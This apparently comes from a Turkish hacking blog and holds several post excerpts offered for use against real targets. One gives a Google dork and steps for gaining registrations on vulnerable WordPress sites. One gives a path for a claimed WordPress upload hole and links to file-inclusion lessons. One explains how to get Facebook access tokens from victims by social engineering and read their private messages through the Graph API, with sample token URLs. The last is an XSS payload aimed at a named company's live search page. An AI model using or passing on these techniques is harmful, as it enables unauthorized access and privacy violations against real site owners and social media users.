Wordpress Login Register

Google Dork: /wp-content/plugins/duplicator/


Exploit ile wordpress sitelerinde üye olabiliyorsunuz. Normal üyelik değil tabiki panele erişim sağlıyor. Yaptığım testler sonucunda exploit doğru ve üye olmayı sağlıyor. Tabii her sitede değil. Ben sadece Login register yolunu denedim. Yazının sonunda exploitin orjinalini paylaşıcam daha geliştirenler olursa iyi olur


Google Dork ile bulduğumuz sitelerin sonuna " wp-login.php?action=register " koyuyoruz. Exploiti kabul eden sitelerde uzantı aynı olur kabul etmeyen sitelerde ise " wp-login.php?registration=disabled " olur. Biz kabul edildi farz edelim sizden username ve email isticektir. Gerekli yerleri doldurduktan sonra şifre emailinize gelicektir.

ÖRNEK SİTE



Bu site ile ne demek istediğimi daha iyi anlayacaksınız.

Fazla kurcalayamadım exploiti o yüzden Login Register ile bazı sitelere üye olabiliyorsunuz sıkıntı ise yetki olmaması. Site sahibine giden mail oluyor onaylanırsa yetkilendiriliyorsunuz ama onaylayacak çıkmaz 


Exploiti daha iyi kullanan olursa iyi olur ben pek bakamadım fazlada anlıyorum diyemem.

Orjinal Exploit

Devamını Oku..

RFI - LFI Dersleri

Local File İnclusion

LFI Exploit via Log File Injection

 Video




Mozilla ve Tamper Data

Video

Remote File İnclusion

Video

Devamını Oku..

Wordpress New Upload Vuln

inurl:wp-includes/SimplePie/theme-options.php

Exp:
wp-includes/SimplePie/theme-options.php

Devamını Oku..

Graph.Facebook İle Kişilerin Mesajlarını Okuma // Yeni Yöntem!

Evet arkadaşlar daha önce bununla iligli birkaç şey duydum fakat anlayamayıp işin içini biraz kurcaladım ve sonunda ne olduğunu çözdüm bu açık diğer facebook kullanıcılarının uygulamalarda vs kullandığı token leri sosyal mühendislik vb yöntemle kullanıcıdan alarak mesajlarına ulaşmanızı sağlıyor. 
Açığın Anlatımı : 

Hedef Kişiye tokenli durum hilesi vs göndererek hedeften token istenmelidir o token i aldıktan sonra 

Kod:

graph.facebook.com/me//inbox?access_token=tokenkoduburayayapıştırılacak

ve sonra enterladığımızda kullanıcının tüm mesajlarına ulaşmış oluyoruz

Örnek Token Linki :

Kod:

https://www.facebook.com/connect/login_success.html#access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDiTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXıpdfnerjWc9Mr2m7jtogjgkoJNh9zxf4d7HN&expires_in=0

Örnek Graph Mesaj Linki : 

Kod:

https://graph.facebook.com/me/inbox?access_token=CAACIS9ZC8nioBAAmAHqZAUpw3oQa3iweGzFQZACvLkVdV8Q9eVww3rJ4XoLXqeGYjSYrBZB0ijezoFGKv1YnjHchuME7OcYU1tHyiZC2n3m7WDidsfsssrgtrgTYfk1bCes2Ft9K13kyuljQKfsKQr0VQCqFVr8PZAakgqDKpoXWc9Mr2m7koJNh9zxf4d7HN&expires_in=0

Dediğim gibi genelde durum beğendirme sitelerinde vs olur veya facebook ile giriş yap olan siteler de . Kullanıcıdan bu tokeni sosyal mühendislikle alabilirsiniz..


Video

Devamını Oku..

Schweppes | XSS Vulnerabilities Okunmuş MesajCevap YazYeni konu açÇıkış Yap

SelamunAleyküm
Kodu gizlemeye gerek duymuyorum arkadaşlar önceki konumdada öyleydi misyon dahilinde kullanmanız dileği ile hayırlı günler.

< ------------------- header data start ------------------- >

#############################################################

# Application Name     : Schweppes

# Vulnerable Type      : XSS

# Author               : AaCcTt

# Demo                 : http://www.schweppes.at/suche

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

"><script>alert(’XSS CWAaCcTt’)</script>

< -- bug code end of -- >

Devamını Oku..